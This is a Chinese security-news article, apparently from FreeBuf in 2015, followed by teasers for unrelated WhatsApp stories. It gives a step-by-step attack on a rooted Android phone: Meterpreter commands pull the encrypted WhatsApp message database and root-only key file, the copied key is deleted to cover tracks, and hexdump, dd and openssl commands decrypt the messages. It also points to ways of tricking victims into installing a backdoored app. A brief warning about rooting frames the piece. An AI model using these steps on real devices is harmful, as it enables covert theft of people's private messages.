解密:攻击者是如何一步步拿下你的WhatsApp数据库

标签: 终端安全 root whatsapp 数据库 解密 | 发表时间:2015-10-08 08:33 | 作者:JackFree
出处:http://www.freebuf.com

针对已root过的安卓移动设备,本文主要讲解远程攻击并解密WhatsApp数据库的详细过程。另外,这再一次提醒我们,对移动设备进行root(安卓)或越狱(iOS),将使用户暴露在黑客攻击之下。

几小时前,网络上发布了一个有趣的文章《 如何远程破解并解密WhatsApp数据库[ROOT]》,文中解释了如何从一个root过的安卓系统中提取并解密WhatsApp数据库。尽管通常情况下WhatsApp非常安全,但对安卓设备的root处理将可能使用户暴露在攻击风险之中。

接下来,就让我们一步一步看看作者(使用匿名 F.E.A.R.)所提出的攻击场景。

步骤1:利用并获取安卓设备的访问权限

正如 这篇指南中所解释的,如果安卓设备通过使用Meterpeter命令进行了root,那么这一阶段将变得很简单。

为了攻击并解密WhatsApp数据库,攻击者需要一个存在于数据文件夹中的密钥文件,而访问该文件的唯一途径就是拥有root权限。此外,该密钥文件是解密WhatsApp数据库所必不可少的。

步骤2:下载数据库

使用下列命令通过Meterpreter下载数据库:

cd /
cd /sdcard/WhatsApp
ls (打印当前目录)
cd Databases
下载msgstore.db.crypt8 (这里需要耗费一些时间,可能很长)

 

步骤3:提取解密密钥

解密WhatsApp数据库所必需的密钥文件中存储了两套解密密钥,即实际的加密密钥K和一个名为IV的初始化向量。值得一提的是,WhatsApp密钥文件存储在一个安全的位置。下面这些都是提取密钥文件的命令:

shell
su(超级用户访问或仅仅进行提权)

正如F.E.A.R.所解释的,这是最困难的部分,特别是如果目标手机用户是有经验且熟练的用户,因为他必须已经安装 SuperSU应用程序。

如何诱导受害者安装SuperSU?

可以看一下用户 bart发布的 这篇教程,里面解释了如何伪装一个后门应用程序。不过,如果下列场景中的受害者并非是一个有经验的或熟练的用户,那么事情将变得更加简单:

1、他们没有安装SuperSU应用程序。
2、对于新安装的应用,他们没有改变设置为PROMPT,而并非GRANT。

执行以下命令来访问密钥文件夹,并提取解密密钥。

cd /
cd /data/data
ls
cd com.whatsapp ls
cd files
ls cp key /sdcard/Download (意思是将文件key拷贝到/sdcard/Download文件夹)

步骤4:下载解密密钥文件到root目录

下载提取的密钥文件到root目录,该目录中还含有加密的WhatsApp数据库:

cd /
cd /sdcard/Download
download key
rm key (确保你删除了key文件)

步骤5:解密WhatsApp数据库

文章中报道了2种不同的方法来解密WhatsApp:

(1)使用Linux命令:每次复制并粘贴一条命令,不要将它们写成一个脚本文件,否则它将不能正常工作:

hexdump -e '2/1 "%02x"' key | cut -b 253-316 > aes.txt

hexdump -n 67 -e '2/1 "%02x"' msgstore.db.crypt8 | cut -b 103-134 > iv.txt

dd if=msgstore.db.crypt8 of=msgstore.db.crypt8.nohdr ibs=67 skip=1

openssl enc -aes-256-cbc -d -nosalt -nopad -bufsize 16384 -in msgstore.db.crypt8.nohdr -K $(cat aes.txt) -iv $(cat iv.txt) > msgstore.gz

gzip -cdq msgstore.gz > msgstore.db

如果第4行命令不能工作,那么就按下面的指令操作:

hexdump -e ‘2/1 “%02x”‘ key | cut -b 253-316

hexdump -n 67 -e ‘2/1 “%02x”‘ msgstore.db.crypt8 | cut -b 103-134

openssl enc -aes-256-cbc -d -nosalt -nopad -bufsize 16384 -in msgstore.db.crypt8.nohdr -K (从第1条指令中粘贴文本文档) -iv (从第2条指令中粘贴文本文档) > msgstore.gz

(2)第二种方法基于简单的Windows WhatsApp查看器应用程序,可以看一下 原文

这是又一次的教训,对移动设备进行root(安卓)或越狱(iOS),将使用户暴露在黑客攻击之下。

*参考来源: securityaffairs,FB小编JackFree编译,转载请注明来自FreeBuf黑客与极客(FreeBuf.com)

相关 [解密 攻击 whatsapp] 推荐:

解密:攻击者是如何一步步拿下你的WhatsApp数据库

- - FreeBuf.COM | 关注黑客与极客
针对已root过的安卓移动设备,本文主要讲解远程攻击并解密WhatsApp数据库的详细过程. 另外,这再一次提醒我们,对移动设备进行root(安卓)或越狱(iOS),将使用户暴露在黑客攻击之下. 几小时前,网络上发布了一个有趣的文章《 如何远程破解并解密WhatsApp数据库[ROOT]》,文中解释了如何从一个root过的安卓系统中提取并解密WhatsApp数据库.

whatsapp深度使用Erlang有感

- - 系统技术非业余研究
原创文章,转载请注明: 转载自 系统技术非业余研究. whatsapp深度使用Erlang有感. 这么多年过去了,社区还在讨论erlang是不是小众语言,各种怀疑的时候,whatsapp已经把erlang用到了极致. 更为搞笑的是 主要开发者Rick Reed([email protected]),之前在Yahoo!, SGI工作,有着深厚的系统性能的背景.

WhatsApp估值的四个支撑点

- - IT经理网
Facebook以190亿美元的价格收购WhatsApp近日在全球新闻界引发了“值不值”的大讨论,WhatsApp 190亿美元的估值成为近年来最大宗的科技收购,在笔者的印象里,最近一次超过200亿美元的科技界收购是多年前惠普以240亿美元的价格收购康柏. 从Mashable给出的这张图表可以看出,在近年互联网公司的收购史中,WhatsApp的估值创下了新高.

190亿收购WhatsApp,Facebook的焦虑症

- - 雷锋网
一大早在上班路上朋友圈就被一个消息刷了屏,Facebook一狠心花了190亿美金收购WhatsApp让整个互联网业界沸腾人民奔走相告就差喜极而泣了. 虽然想不到这事儿跟他们有什么关系. 很多人都觉得Facebook是疯了,这么大一笔巨款收购一个似乎没多少营收的通讯应用. 不过这大多是因为“190亿”整个数字实在是太吸引眼球而已.

WhatsApp日消息420亿条,值190亿

- - 钛媒体网
2月20日,大洋彼岸的一则并购案例在神州大地被主流媒体报道和传播,引发了广泛的关注和热议. “Facebook190亿美元收购WhatsApp”这条新闻是美国两家公司之间的并购,虽然这笔并购对互联网行业来说是大新闻,打破了该行业最高的并购记录(美国在线和时代华纳的实际并购不属于互联网行业并购). 但“ facebook收购WhatsApp”毕竟这是国外的并购案例,为何会引发包括中国在内的全球主流媒体的聚焦关注?其主要原因就在于WhatsApp是一款通讯类软件,这款软件经过短短4年的发展,已经成为全球最主要的沟通工具之一,全球用户使用该软件发送的消息单日超过420亿条!.

WhatsApp比微信好在哪里?

- - 月光博客
  摘要:WhatApp专注于通讯工具,功能简单,速度飞快,其核心功能的竞争力就会越来越强,因为是付费应用,因此就可以专注为用户服务,不用考虑通过各种花里胡哨的增值服务来盈利;而微信是免费应用,倾向于平台化发展,因此会越来越庞大臃肿,通过附加的各种增值服务来实现盈利.   今天,全球最大社交网络Facebook 宣布将以190亿美元的价格收购即时通讯应用WhatsApp,跨平台通讯应用WhatsApp创办于2009年,目前用户量已经超过4.5亿人,其中日活跃用户比例为70%;每日新注册用户超过100万人.

丟掉 Viber、Whatsapp,換上免費又可愛的 Line app 吧!

- 同道|贾怀军 - T客邦
iPhone 和 Android 上最有名的通訊軟體就是 Viber 和 Whatsapp,不過現在又推出了一個殺手級的可愛通訊軟體. 名為 Line 的通訊軟體一開放就同時支援 iPhone 和 Android,而且能傳訊息還能打語音電話,更重要的是這個程式是免費下載. 你還不丟掉 Viber 和 Whatsapp 嗎.

WhatsApp Messenger 的十面埋伏与背水一战

- 沈蚊 - 爱范儿 · Beats of Bits
在世界总人口数突破 70 亿大关的这周里,对于处在美国加州硅谷的 WhatsApp Messenger 开发团队来说,他们也有自己的一个“10 亿”大关值得庆贺. 10 月 31 日,利用官方博客,WhatsApp 宣布:上周,全球用户在单日内通过 WhatsApp Messenger 发送的信息数已达 10 亿条.

WhatsApp开测免费语音通话 电信业面临冲击

- - 创业邦
  被Facebook斥资220亿美元收购的WhatsApp,如今已经成为拥有七亿活跃用户的全球最大手机聊天工具. 去年初,WhatsApp高层曾表示,WhatsApp将会推出免费语音通话功能. 据最新报道,WhatsApp已经展开了通话功能的测试,相关的截图已经被网友发到了网络上.   对于全球的电信行业而言,短信业务已经被手机聊天工具蚕食.

拥有9亿用户的WhatsApp,工程师只有50人

- - 博客园_新闻
WhatsApp 是全球最受欢迎的聊天软件,用户数量达到 9 亿. 在 WhatsApp 成长过程中,最让人惊奇是事情是,这件壮举是由一个小团队完成的. 在公司被 Facebook 收购之前,它已拥有 4.5 亿用户,而公司的工程师只有 35 名. 如今,它的工程师数量也只是增加到了 50 名. WhatsApp 很少谈论技术方面的事情.